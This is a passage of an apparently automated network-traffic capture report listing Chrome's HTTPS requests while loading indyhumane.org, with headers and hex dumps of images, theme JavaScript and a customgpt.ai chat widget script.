                                                                                                                                                                                                                                                        2025-01-09 01:59:14 UTC1369INData Raw: 69 74 69 6f 6e 3f 22 72 69 67 68 74 22 3a 22 6c 65 66 74 22 5d 3a 22 31 30 30 25 22 2c 5b 74 68 69 73 2e 63 75 72 72 65 6e 74 50 6f 73 69 74 69 6f 6e 5d 3a 22 61 75 74 6f 22 7d 29 2c 74 68 69 73 2e 24 69 6e 70 75 74 2e 73 68 6f 77 28 29 2e 61 64 64 43 6c 61 73 73 28 22 74 63 62 2d 73 66 2d 65 78 70 61 6e 64 22 29 2c 74 68 69 73 2e 7a 49 6e 64 65 78 4f 72 64 65 72 28 29 2c 63 6c 65 61 72 54 69 6d 65 6f 75 74 28 74 68 69 73 2e 68 69 64 65 45 78 70 61 6e 64 54 69 6d 65 6f 75 74 29 2c 74 68 69 73 2e 69 73 4f 70 65 6e 65 64 3d 21 30 7d 68 69 64 65 45 78 70 61 6e 64 28 65 3d 21 31 29 7b 63 6f 6e 73 74 20 74 3d 28 29 3d 3e 7b 69 2e 69 6e 6c 69 6e 65 43 73 73 56 61 72 69 61 62 6c 65 28 74 68 69 73 2e 24 65 6c 65 6d 65 6e 74 2c 22 2d 2d 74 76 65 2d 61 70 70 6c 69
                                                                                                                                                                                                                                                        Data Ascii: ition?"right":"left"]:"100%",[this.currentPosition]:"auto"}),this.$input.show().addClass("tcb-sf-expand"),this.zIndexOrder(),clearTimeout(this.hideExpandTimeout),this.isOpened=!0}hideExpand(e=!1){const t=()=>{i.inlineCssVariable(this.$element,"--tve-appli
                                                                                                                                                                                                                                                        2025-01-09 01:59:14 UTC1045INData Raw: 74 68 69 73 2e 69 73 4f 70 65 6e 65 64 3d 21 30 7d 68 69 64 65 54 6f 6f 6c 74 69 70 28 29 7b 69 2e 69 6e 6c 69 6e 65 43 73 73 56 61 72 69 61 62 6c 65 28 74 68 69 73 2e 24 65 6c 65 6d 65 6e 74 2c 22 2d 2d 74 76 65 2d 61 70 70 6c 69 65 64 2d 6d 61 78 2d 77 69 64 74 68 22 2c 22 22 29 2c 69 2e 69 6e 6c 69 6e 65 43 73 73 56 61 72 69 61 62 6c 65 28 74 68 69 73 2e 24 69 6e 70 75 74 2c 7b 6c 65 66 74 3a 22 22 2c 72 69 67 68 74 3a 22 22 7d 29 2c 74 68 69 73 2e 24 65 6c 65 6d 65 6e 74 2e 72 65 6d 6f 76 65 43 6c 61 73 73 28 22 74 63 62 2d 73 66 2d 73 68 6f 77 2d 74 6f 6f 6c 74 69 70 22 29 2c 74 68 69 73 2e 7a 49 6e 64 65 78 4f 72 64 65 72 28 21 31 29 2c 74 68 69 73 2e 69 73 4f 70 65 6e 65 64 3d 21 31 7d 69 73 49 6e 70 75 74 48 69 64 64 65 6e 28 29 7b 72 65 74 75 72
                                                                                                                                                                                                                                                        Data Ascii: this.isOpened=!0}hideTooltip(){i.inlineCssVariable(this.$element,"--tve-applied-max-width",""),i.inlineCssVariable(this.$input,{left:"",right:""}),this.$element.removeClass("tcb-sf-show-tooltip"),this.zIndexOrder(!1),this.isOpened=!1}isInputHidden(){retur


                                                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                        77192.168.2.449840192.0.77.394432044C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                        2025-01-09 01:59:14 UTC625OUTGET /wp-content/uploads/2023/06/clinics.png HTTP/1.1
                                                                                                                                                                                                                                                        Host: 149955744.v2.pressablecdn.com
                                                                                                                                                                                                                                                        Connection: keep-alive
                                                                                                                                                                                                                                                        sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                                                        sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                        sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                                                        Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                                                                                                                                                                                                                                        Sec-Fetch-Site: cross-site
                                                                                                                                                                                                                                                        Sec-Fetch-Mode: no-cors
                                                                                                                                                                                                                                                        Sec-Fetch-Dest: image
                                                                                                                                                                                                                                                        Referer: https://indyhumane.org/
                                                                                                                                                                                                                                                        Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                        Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                                        2025-01-09 01:59:14 UTC592INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                        Server: nginx
                                                                                                                                                                                                                                                        Date: Thu, 09 Jan 2025 01:59:14 GMT
                                                                                                                                                                                                                                                        Content-Type: image/png
                                                                                                                                                                                                                                                        Content-Length: 431066
                                                                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                                                                        Link: <http://indyhumane.org/wp-content/uploads/2023/06/clinics.png>; rel="canonical"
                                                                                                                                                                                                                                                        Last-Modified: Fri, 16 Jun 2023 00:05:52 GMT
                                                                                                                                                                                                                                                        Expires: Thu, 16 Jan 2025 01:59:14 GMT
                                                                                                                                                                                                                                                        Cache-Control: max-age=604800
                                                                                                                                                                                                                                                        Access-Control-Allow-Origin: *
                                                                                                                                                                                                                                                        Access-Control-Allow-Methods: GET, HEAD
                                                                                                                                                                                                                                                        X-ac: 1.jfk _atomic_dca MISS
                                                                                                                                                                                                                                                        Alt-Svc: h3=":443"; ma=86400
                                                                                                                                                                                                                                                        Strict-Transport-Security: max-age=15552000
                                                                                                                                                                                                                                                        Alt-Svc: h3=":443"; ma=86400
                                                                                                                                                                                                                                                        X-nc: MISS jfk 1
                                                                                                                                                                                                                                                        Accept-Ranges: bytes
                                                                                                                                                                                                                                                        2025-01-09 01:59:14 UTC777INData Raw: 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 03 84 00 00 02 75 08 06 00 00 00 81 f7 3e 33 00 00 00 04 67 41 4d 41 00 00 b1 8f 0b fc 61 05 00 00 0a 49 69 43 43 50 73 52 47 42 20 49 45 43 36 31 39 36 36 2d 32 2e 31 00 00 48 89 9d 53 77 58 93 f7 16 3e df f7 65 0f 56 42 d8 f0 b1 97 6c 81 00 22 23 ac 08 c8 10 59 a2 10 92 00 61 84 10 12 40 c5 85 88 0a 56 14 15 11 9c 48 55 c4 82 d5 0a 48 9d 88 e2 a0 28 b8 67 41 8a 88 5a 8b 55 5c 38 ee 1f dc a7 b5 7d 7a ef ed ed fb d7 fb bc e7 9c e7 fc ce 79 cf 0f 80 11 12 26 91 e6 a2 6a 00 39 52 85 3c 3a d8 1f 8f 4f 48 c4 c9 bd 80 02 15 48 e0 04 20 10 e6 cb c2 67 05 c5 00 00 f0 03 79 78 7e 74 b0 3f fc 01 af 6f 00 02 00 70 d5 2e 24 12 c7 e1 ff 83 ba 50 26 57 00 20 91 00 e0 22 12 e7 0b 01 90 52 00 c8 2e 54 c8 14 00 c8 18
                                                                                                                                                                                                                                                        Data Ascii: PNGIHDRu>3gAMAaIiCCPsRGB IEC61966-2.1HSwX>eVBl"#Ya@VHUH(gAZU\8}zy&j9R<:OHH gyx~t?op.$P&W "R.T
                                                                                                                                                                                                                                                        2025-01-09 01:59:14 UTC1369INData Raw: 6a 91 5d 48 23 f2 2d 72 14 39 8d 5c 40 fa 90 db c8 20 32 8a fc 8a bc 47 31 94 81 b2 51 03 d4 02 75 40 b9 a8 1f 1a 8a c6 a0 73 d1 74 34 0f 5d 80 96 a2 6b d1 1a b4 1e 3d 80 b6 a2 a7 d1 4b e8 75 74 00 7d 8a 8e 63 80 d1 31 0e 66 8c d9 61 5c 8c 87 45 60 89 58 1a 26 c7 16 63 e5 58 35 56 8f 35 63 1d 58 37 76 15 1b c0 9e 61 ef 08 24 02 8b 80 13 ec 08 5e 84 10 c2 6c 82 90 90 47 58 4c 58 43 a8 25 ec 23 b4 12 ba 08 57 09 83 84 31 c2 27 22 93 a8 4f b4 25 7a 12 f9 c4 78 62 3a b1 90 58 46 ac 26 ee 21 1e 21 9e 25 5e 27 0e 13 5f 93 48 24 0e c9 92 e4 4e 0a 21 25 90 32 49 0b 49 6b 48 db 48 2d a4 53 a4 3e d2 10 69 9c 4c 26 eb 90 6d c9 de e4 08 b2 80 ac 20 97 91 b7 90 0f 90 4f 92 fb c9 c3 e4 b7 14 3a c5 88 e2 4c 09 a2 24 52 a4 94 12 4a 35 65 3f e5 04 a5 9f 32 42 99 a0 aa 51
                                                                                                                                                                                                                                                        Data Ascii: j]H#-r9\@ 2G1Qu@st4]k=Kut}c1fa\E`X&cX5V5cX7va$^lGXLXC%#W1'"O%zxb:XF&!!%^'_H$N!%2IIkHH-S>iL&m O:L$RJ5e?2BQ
                                                                                                                                                                                                                                                        2025-01-09 01:59:14 UTC1369INData Raw: cb 6e ae f4 5a b9 63 15 61 95 64 55 ef 6a 97 d5 5b 56 7f 2a 17 95 5f ac 70 ac a8 ae f8 b0 46 b8 e6 e2 57 4e 5f d5 7c f5 79 6d da da de 4a b7 ca ed eb 48 eb a4 eb 6e ac f7 59 bf af 4a bd 6a 41 d5 d0 86 f0 0d ad 1b f1 8d e5 1b 5f 6d 4a de 74 a1 7a 6a f5 8e cd b4 cd ca cd 03 35 61 35 ed 5b cc b6 ac db f2 a1 36 a3 f6 7a 9d 7f 5d cb 56 fd ad ab b7 be d9 26 da d6 bf dd 77 7b f3 0e 83 1d 15 3b de ef 94 ec bc b5 2b 78 57 6b bd 45 7d f5 6e d2 ee 82 dd 8f 1a 62 1b ba bf e6 7e dd b8 47 77 4f c5 9e 8f 7b a5 7b 07 f6 45 ef eb 6a 74 6f 6c dc af bf bf b2 09 6d 52 36 8d 1e 48 3a 70 e5 9b 80 6f da 9b ed 9a 77 b5 70 5a 2a 0e c2 41 e5 c1 27 df a6 7c 7b e3 50 e8 a1 ce c3 dc c3 cd df 99 7f b7 f5 08 eb 48 79 2b d2 3a bf 75 ac 2d a3 6d a0 3d a1 bd ef e8 8c a3 9d 1d 5e 1d 47 be
                                                                                                                                                                                                                                                        Data Ascii: nZcadUj[V*_pFWN_|ymJHnYJjA_mJtzj5a5[6z]V&w{;+xWkE}nb~GwO{{EjtolmR6H:powpZ*A'|{PHy+:u-m=^G
                                                                                                                                                                                                                                                        2025-01-09 01:59:14 UTC1369INData Raw: b0 d4 4a 99 fb 19 4f c9 4e f4 80 ac fb a2 34 77 27 f4 4b 01 21 c7 47 e7 8b c8 af 07 84 71 3e 1e 01 84 f6 5d 04 84 dd 45 50 4b f7 fd 14 eb 25 f2 7e 46 40 e8 1b b4 12 02 a3 b0 57 b7 bd fa b3 7d 97 f9 d4 22 db 05 84 7b 43 55 68 dc e7 00 61 a7 4c 7f be 86 57 7b 7d 21 1a 0f 7f c5 98 51 cf 5f 04 64 ed bc b6 79 da 9f 5e 56 fc 93 c0 c4 e3 fd ef cf 95 30 1e 2e 19 93 92 3a 75 3f 9b 92 4e 86 81 42 66 70 f5 88 40 b6 9e 1f de bc 50 e1 b0 26 fc 47 a0 c6 19 df 1a 84 17 27 f8 70 e6 48 01 f0 fc a7 4a 3a be 4f a5 47 fa eb e3 e3 c8 a5 01 29 01 10 06 61 c3 c6 3e eb 3f 5e 32 d6 fb 8a e5 63 c1 f2 f3 8e fb 8f 1b ee 3f 6e 58 7e de 55 c0 2c a0 3d 4d 13 78 9d 05 1c 5e 26 4c 97 09 e9 3a b9 f0 49 44 3a 6f 22 c0 e6 25 23 df 17 e4 7b c6 72 5f b0 de 16 2c 3f 17 ac 1f 77 2c 1f 8b 08 06
                                                                                                                                                                                                                                                        Data Ascii: JON4w'K!Gq>]EPK%~F@W}"{CUhaLW{}!Q_dy^V0.:u?NBfp@P&G'pHJ:OG)a>?^2c?nX~U,=Mx^&L:ID:o"%#{r_,?w,
                                                                                                                                                                                                                                                        2025-01-09 01:59:14 UTC1369INData Raw: 3c 6e 36 2e b9 6c 53 58 78 2c db 3f 73 cd de 4b 01 30 56 56 ea 35 2b c0 94 32 6c 6f 4f 97 09 97 f7 0b e6 6f 57 5c de 2f 98 ae 02 10 d3 45 41 a1 29 83 d2 b1 59 f0 4b 41 61 bd 90 be 3c 3d 4c 37 3c b5 2a d0 6d b9 9e 73 c0 5b 45 9e d2 bd c2 54 d6 20 b3 38 3d 30 83 28 37 2e bc 0a 48 dc 9a 2c e0 ff f6 1f 3f 71 fb e3 03 7f fe d7 ff c0 b7 ff f2 3b 2e bf bf 81 a6 84 f9 3a 03 94 40 0a 36 c5 e3 a6 06 21 26 0f 70 c6 13 74 b1 a5 41 da c6 27 e4 57 db 3b 76 f4 4c da d4 80 c2 40 70 4c fe 20 62 20 d0 48 03 76 9c d9 2d 89 de 3a e5 5f 3d c9 84 a0 fc ed 68 3d b8 90 88 6e 5e 52 d7 2b 1e 14 d4 ca a3 6d bb 8f ea 6f 8d 2d d5 77 07 f3 b7 01 84 51 c8 e8 09 df cf 08 2f 47 df 55 8a b7 c7 4a 7e ea ab 67 93 11 87 9e 86 b2 d2 7a 6e da 17 3e b6 df d1 59 f7 26 e0 9f 1c e3 2d 51 09 ef f6
                                                                                                                                                                                                                                                        Data Ascii: <n6.lSXx,?sK0VV5+2loOoW\/EA)YKAa<=L7<*ms[ET 8=0(7.H,?q;.:@6!&ptA'W;vL@pL b Hv-:_=h=n^R+mo-wQ/GUJ~gzn>Y&-Q
                                                                                                                                                                                                                                                        2025-01-09 01:59:14 UTC1369INData Raw: 2d c0 1e b0 29 63 af 8b 92 b8 76 72 a6 d2 1e 15 42 56 03 84 2a 00 10 01 eb 6d 75 ab a1 05 cf c8 0a 0a a7 eb 84 3c 25 ac 69 15 97 a2 44 1a 98 20 81 26 20 6a 59 db b4 cf cb ca c2 e9 92 cf 28 fc 70 a7 2c 0e 8c f8 08 48 9d 49 43 da ab c2 93 69 c9 bb e7 54 b8 fb ab 83 96 83 3a e2 bb ea 9c e0 59 5a f9 02 7a dd fe fd 14 c8 6c 00 d2 48 98 8c 79 ba c5 b8 d2 0f 63 45 c3 ce b8 fa 18 b6 60 3b 12 d1 1e dd b2 a1 b7 fc e1 ac ae 2b d1 42 d9 d6 0e 53 a0 52 22 a4 cb 8c f9 db 55 ac 83 7a 76 70 ba 84 b3 83 76 76 38 78 90 bc 3a 9d 29 d5 95 be 3d 8d ee c9 79 6a bf 31 57 c1 6e ee 1d 36 bc 69 53 55 37 9e a3 eb 27 ea 2b 15 88 bc c2 f2 8b 02 15 02 90 30 5d 26 80 81 79 cd b8 fe e3 1d eb b2 62 f9 79 d7 33 85 2b 6e 7f fc c4 ed cf 0f fc f9 ff fd 9f 98 ae a2 0c 20 22 5c ff f1 86 34 4f
                                                                                                                                                                                                                                                        Data Ascii: -)cvrBV*mu<%iD & jY(p,HICiT:YZzlHycE`;+BSR"Uzvpvv8x:)=yj1Wn6iSU7'+0]&yby3+n "\4O
                                                                                                                                                                                                                                                        2025-01-09 01:59:14 UTC1369INData Raw: 8f 5c 00 1a 6b 13 f7 19 dd 97 26 c7 75 e7 ea 76 61 ae 2b d5 f5 f2 6f 17 9f 3e 78 a4 95 7f 79 8a ee a3 a6 09 37 66 f9 14 30 dc 35 cd 87 f5 65 9a c4 86 68 0f db e7 e5 3f de a4 4e 53 fa 56 8d 36 51 f9 49 8d 55 10 40 65 19 b4 7b b6 1c 08 d2 76 8d 8c 98 ef c3 67 5d 9f 49 91 9e bb cb 68 47 e0 b2 bc 7a 60 7d 4f f1 f4 4b da fd b7 49 66 f5 96 d4 0e 09 3b 31 74 a2 08 b2 e1 31 21 38 58 94 2d ca 68 b4 22 d0 44 30 0b b3 6b 94 cd 45 14 ec 81 65 e4 9a 88 8c 75 59 fd ac 54 09 22 a3 eb 93 a5 01 c9 1a 08 06 e7 4b a0 8b f0 70 f9 cc 00 d6 d5 cf c5 d0 87 b4 6d b9 2e 02 06 2f 2b f2 9a 40 29 17 2d 77 36 e6 cc d5 5a 1f a5 67 b4 de 9b bc 0d 18 1c e5 e5 b8 d6 fd b1 95 d1 df fb c3 b3 b2 bd 8a e2 dc 1f b8 37 5a dd 06 66 f7 40 80 d0 10 54 63 e3 de 06 18 04 3f a0 d2 f6 e7 80 61 23 cd
                                                                                                                                                                                                                                                        Data Ascii: \k&uva+o>xy7f05eh?NSV6QIU@e{vg]IhGz`}OKIf;1t1!8X-h"D0kEeuYT"Kpm./+@)-w6Zg7Zf@Tc?a#
                                                                                                                                                                                                                                                        2025-01-09 01:59:14 UTC1369INData Raw: b7 3f 3f dc 8b 22 af 19 df 6e 2b 2e ff 78 93 a8 b3 d7 19 e0 0b d2 2c 75 cb 51 01 aa f6 6a ec 46 bc 3a 67 d3 d7 3d 1e dc 75 87 0e e3 ba a7 0c 6e eb 90 c1 2a d6 b7 48 37 c2 d9 c2 01 db d3 a5 d1 af cb 74 a5 9b a6 38 cd e9 c9 99 35 1d e2 fa 95 ae 43 ae 69 e8 a6 5e f6 f1 8e 47 20 5f 9d ea a0 32 03 a1 b9 28 99 79 7b de 30 0a d2 67 2c 4f 5e 16 6a ad cf 5e 7e 22 50 7e 1e 14 9e 7a d6 c9 d3 82 c2 b1 66 b2 49 41 68 f5 89 3e d3 fa b8 a8 e2 66 08 2f a5 0d 0f 04 20 88 cd 1a 7d 74 c6 ba f8 17 a7 ca 75 a7 62 fa 26 bc ee cc 29 c5 b1 2b cf da cd 7b 78 56 e4 8b d3 be a5 72 ef 43 14 4b 8e 07 89 81 f7 b1 05 83 54 7c f2 ca f7 7b 60 f0 70 69 04 41 e5 93 c9 85 3a 13 c4 38 3c d4 3d e1 ee 7f f6 01 87 05 51 9a b3 fd 39 6e 7a f8 d3 f6 fa 7f 4e 60 78 f6 0c 8b 09 f6 43 92 00 e8 b9 bb
                                                                                                                                                                                                                                                        Data Ascii: ??"n+.x,uQjF:g=un*H7t85Ci^G _2(y{0g,O^j^~"P~zfIAh>f/ }tub&)+{xVrCKT|{`piA:8<=Q9nzN`xC
                                                                                                                                                                                                                                                        2025-01-09 01:59:14 UTC1369INData Raw: 8e e2 db 3c bb ed 6e fa 78 00 a2 1c 64 6c ca ff 3c 33 7c 14 14 96 26 d5 e3 c1 dd e7 f6 7a 0b fa 1d 0c b6 e3 1c f2 c1 c0 5e 10 7a fd 5d dd 8d 72 df a0 9d a5 5d 2d e8 12 97 f1 e6 52 7f 42 89 42 39 bf cd 48 d7 d6 32 98 5c b1 f8 30 58 6a 79 4b b4 10 bd 9a 8e 36 04 ff a9 33 fb 26 bf bc b0 59 75 f1 01 dc e8 de 2a b2 7e 38 0a 65 fb a9 51 02 00 d8 06 43 56 ac 66 b1 31 a4 0a 1d 8c 66 6f 79 00 b9 49 dc fc e7 f7 0b ae bf bf 61 f9 97 6f 78 ff f3 77 7c fc 51 5c 47 79 95 e0 5c f7 1f 76 56 5c 15 07 17 55 1e 5c a6 e0 59 01 e7 07 29 95 d0 9c 9c 18 9c 95 3f 27 f1 0e 11 e5 9b ad 77 fd dc 02 97 86 bb 85 23 bf 3f 4a 1c 94 1e d6 fb 02 96 03 b0 74 59 bc 96 73 5d 0d da 5a 15 1b ba 52 59 41 fb 0d 29 bf da 2a aa 68 27 60 16 7b 8a 9f 50 04 b1 85 16 09 28 3c 90 3b 6c aa bf 80 31 11
                                                                                                                                                                                                                                                        Data Ascii: <nxdl<3|&z^z]r]-RBB9H2\0XjyK63&Yu*~8eQCVf1foyIaoxw|Q\Gy\vV\U\Y)?'w#?JtYs]ZRYA)*h'`{P(<;l1
                                                                                                                                                                                                                                                        2025-01-09 01:59:14 UTC1369INData Raw: 23 c3 d4 03 83 d1 25 74 08 06 63 19 46 10 4f d4 bb db b6 23 ed bd e6 19 d0 37 65 22 03 e2 e7 8c 25 02 42 e8 a1 f9 50 b7 96 1f c3 74 ef a5 e1 74 06 26 f0 77 01 83 a6 c9 7e c4 1d f4 85 0d 80 57 ea 6b 2b f9 7d 84 55 84 42 75 3b cb ba f6 d4 b9 50 e9 8f 9c 1d cc 4b 16 c1 e3 b6 48 60 99 75 05 f3 5c ad 01 17 62 10 84 1a 13 68 18 00 a6 ba 8d 3a f7 be 84 ee 6b 7d f7 e1 7d 15 6b e1 bc 62 4d d2 fe bc 64 9d df ac 9a 58 75 4f 3d 61 69 36 65 5d 45 57 ff 6e 60 d0 d2 89 25 5c 05 9c 19 d0 c7 33 6b ce 78 ef 3e bb 8c 9a 82 13 63 e6 74 e3 28 5f 99 17 6d c6 b6 7d 34 fa a3 cd 58 35 b1 5b 17 c0 0f 05 22 29 74 0e dd 3e b9 cb 58 ee 7c a8 ca 08 03 82 f2 77 76 c1 97 83 90 9d c3 15 2f 76 76 d0 c1 a0 6e 2c 39 53 36 61 52 b7 6f 3f 03 3c c5 eb 63 e8 73 3c af 43 ef 0f 41 e1 a0 a8 87 bd
                                                                                                                                                                                                                                                        Data Ascii: #%tcFO#7e"%BPtt&w~Wk+}UBu;PKH`u\bh:k}}kbMdXuO=ai6e]EWn`%\3kx>ct(_m}4X5[")t>X|wv/vvn,9S6aRo?<cs<CA


                                                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                        78192.168.2.44983465.9.66.194432044C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                        2025-01-09 01:59:14 UTC350OUTGET /js/chat.js HTTP/1.1
                                                                                                                                                                                                                                                        Host: cdn.customgpt.ai
                                                                                                                                                                                                                                                        Connection: keep-alive
                                                                                                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                        Accept: */*
                                                                                                                                                                                                                                                        Sec-Fetch-Site: none
                                                                                                                                                                                                                                                        Sec-Fetch-Mode: cors
                                                                                                                                                                                                                                                        Sec-Fetch-Dest: empty
                                                                                                                                                                                                                                                        Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                        Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                                        2025-01-09 01:59:14 UTC570INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                        Content-Type: text/javascript
                                                                                                                                                                                                                                                        Content-Length: 25822
                                                                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                                                                        Date: Thu, 02 Jan 2025 17:50:24 GMT
                                                                                                                                                                                                                                                        Last-Modified: Thu, 02 Jan 2025 13:47:19 GMT
                                                                                                                                                                                                                                                        ETag: "01d69629e7e8550c81ca7654836e6f00"
                                                                                                                                                                                                                                                        x-amz-server-side-encryption: AES256
                                                                                                                                                                                                                                                        x-amz-version-id: TbciERkv3wcf7xGMP3gKdGGmuNuiY9Dc
                                                                                                                                                                                                                                                        Accept-Ranges: bytes
                                                                                                                                                                                                                                                        Server: AmazonS3
                                                                                                                                                                                                                                                        X-Cache: Hit from cloudfront
                                                                                                                                                                                                                                                        Via: 1.1 f2fa38e6635ded6d22a69d089217bc90.cloudfront.net (CloudFront)
                                                                                                                                                                                                                                                        X-Amz-Cf-Pop: FRA56-C1
                                                                                                                                                                                                                                                        X-Amz-Cf-Id: NmUnNcjexUVivyo2zjbUa-ACO8KUJz3-AviwPav0afRlgq2pq3ZS8Q==
                                                                                                                                                                                                                                                        Age: 547731
                                                                                                                                                                                                                                                        Vary: Origin
                                                                                                                                                                                                                                                        2025-01-09 01:59:14 UTC16384INData Raw: 76 61 72 20 63 75 73 74 6f 6d 67 70 74 44 65 66 61 75 6c 74 43 53 53 3d 22 2e 63 67 70 74 63 62 2d 62 6f 64 79 20 7b 5c 6e 20 20 20 20 7a 2d 69 6e 64 65 78 3a 20 32 31 34 37 34 38 33 30 30 30 3b 5c 6e 20 20 20 20 70 6f 73 69 74 69 6f 6e 3a 20 66 69 78 65 64 3b 5c 6e 7d 5c 6e 2e 63 67 70 74 63 62 2d 62 6f 64 79 20 2e 63 67 70 74 63 62 2d 63 68 61 74 2d 63 69 72 63 6c 65 2c 5c 6e 2e 63 67 70 74 63 62 2d 62 6f 64 79 20 2e 63 67 70 74 63 62 2d 63 68 61 74 2d 62 6f 78 2d 74 6f 67 67 6c 65 20 7b 5c 6e 20 20 20 20 70 6f 73 69 74 69 6f 6e 3a 20 66 69 78 65 64 3b 5c 6e 20 20 20 20 62 6f 74 74 6f 6d 3a 20 31 72 65 6d 3b 5c 6e 20 20 20 20 6c 65 66 74 3a 20 76 61 72 28 2d 2d 63 68 61 74 62 6f 74 2d 70 6f 73 69 74 69 6f 6e 2d 6c 65 66 74 2c 20 61 75 74 6f 29 3b 5c 6e
                                                                                                                                                                                                                                                        Data Ascii: var customgptDefaultCSS=".cgptcb-body {\n z-index: 2147483000;\n position: fixed;\n}\n.cgptcb-body .cgptcb-chat-circle,\n.cgptcb-body .cgptcb-chat-box-toggle {\n position: fixed;\n bottom: 1rem;\n left: var(--chatbot-position-left, auto);\n
                                                                                                                                                                                                                                                        2025-01-09 01:59:14 UTC8987INData Raw: 31 33 20 32 34 2e 34 31 36 34 20 32 35 2e 33 35 37 33 20 32 34 2e 35 36 33 31 20 32 35 2e 33 39 36 43 32 34 2e 37 31 36 35 20 32 35 2e 34 33 36 33 20 32 34 2e 38 37 36 35 20 32 35 2e 34 35 37 37 20 32 35 2e 30 33 39 39 20 32 35 2e 34 35 37 37 43 32 36 2e 30 37 35 33 20 32 35 2e 34 35 37 37 20 32 36 2e 38 38 39 34 20 32 34 2e 36 35 38 34 20 32 36 2e 38 38 39 34 20 32 33 2e 36 34 30 39 43 32 36 2e 38 38 39 34 20 32 32 2e 36 32 33 36 20 32 36 2e 30 37 35 33 20 32 31 2e 38 32 34 34 20 32 35 2e 30 33 39 39 20 32 31 2e 38 32 34 34 43 32 34 2e 33 30 30 34 20 32 31 2e 38 32 34 34 20 32 33 2e 36 33 34 33 20 32 32 2e 32 36 30 34 20 32 33 2e 33 33 39 20 32 32 2e 39 31 34 33 48 31 39 2e 39 33 36 36 56 32 36 2e 33 32 39 36 48 31 37 2e 31 32 35 35 56 38 2e 38 38 39 39
                                                                                                                                                                                                                                                        Data Ascii: 13 24.4164 25.3573 24.5631 25.396C24.7165 25.4363 24.8765 25.4577 25.0399 25.4577C26.0753 25.4577 26.8894 24.6584 26.8894 23.6409C26.8894 22.6236 26.0753 21.8244 25.0399 21.8244C24.3004 21.8244 23.6343 22.2604 23.339 22.9143H19.9366V26.3296H17.1255V8.8899
                                                                                                                                                                                                                                                        2025-01-09 01:59:14 UTC451INData Raw: 77 20 55 52 4c 53 65 61 72 63 68 50 61 72 61 6d 73 3b 72 65 74 75 72 6e 20 63 2e 73 65 74 28 22 73 68 61 72 65 61 62 6c 65 5f 73 6c 75 67 22 2c 65 29 2c 63 2e 73 65 74 28 22 63 68 61 74 62 6f 74 5f 73 68 61 72 69 6e 67 5f 73 65 74 74 69 6e 67 73 5f 73 65 63 74 69 6f 6e 22 2c 22 6c 69 76 65 5f 63 68 61 74 22 29 2c 6f 2e 73 65 61 72 63 68 3d 63 2e 74 6f 53 74 72 69 6e 67 28 29 2c 6e 65 77 20 50 72 6f 6d 69 73 65 28 28 28 74 2c 6e 29 3d 3e 7b 66 65 74 63 68 28 6f 2e 74 6f 53 74 72 69 6e 67 28 29 29 2e 74 68 65 6e 28 28 74 3d 3e 7b 69 66 28 5b 32 30 30 2c 34 30 34 5d 2e 69 6e 63 6c 75 64 65 73 28 74 2e 73 74 61 74 75 73 29 26 26 74 2e 68 65 61 64 65 72 73 2e 67 65 74 28 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 29 3f 2e 69 6e 63 6c 75 64 65 73 28 22 61 70 70
                                                                                                                                                                                                                                                        Data Ascii: w URLSearchParams;return c.set("shareable_slug",e),c.set("chatbot_sharing_settings_section","live_chat"),o.search=c.toString(),new Promise(((t,n)=>{fetch(o.toString()).then((t=>{if([200,404].includes(t.status)&&t.headers.get("content-type")?.includes("app


                                                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                        79192.168.2.449842192.0.77.394432044C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                        2025-01-09 01:59:14 UTC659OUTGET /wp-content/uploads/2024/11/317_logo_proposed_simpler_inverse-768x161.png HTTP/1.1
                                                                                                                                                                                                                                                        Host: 149955744.v2.pressablecdn.com
                                                                                                                                                                                                                                                        Connection: keep-alive
                                                                                                                                                                                                                                                        sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                                                        sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                        sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                                                        Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                                                                                                                                                                                                                                        Sec-Fetch-Site: cross-site
                                                                                                                                                                                                                                                        Sec-Fetch-Mode: no-cors
                                                                                                                                                                                                                                                        Sec-Fetch-Dest: image
                                                                                                                                                                                                                                                        Referer: https://indyhumane.org/
                                                                                                                                                                                                                                                        Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                        Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                                        2025-01-09 01:59:14 UTC625INHTTP/1.1 200 OK
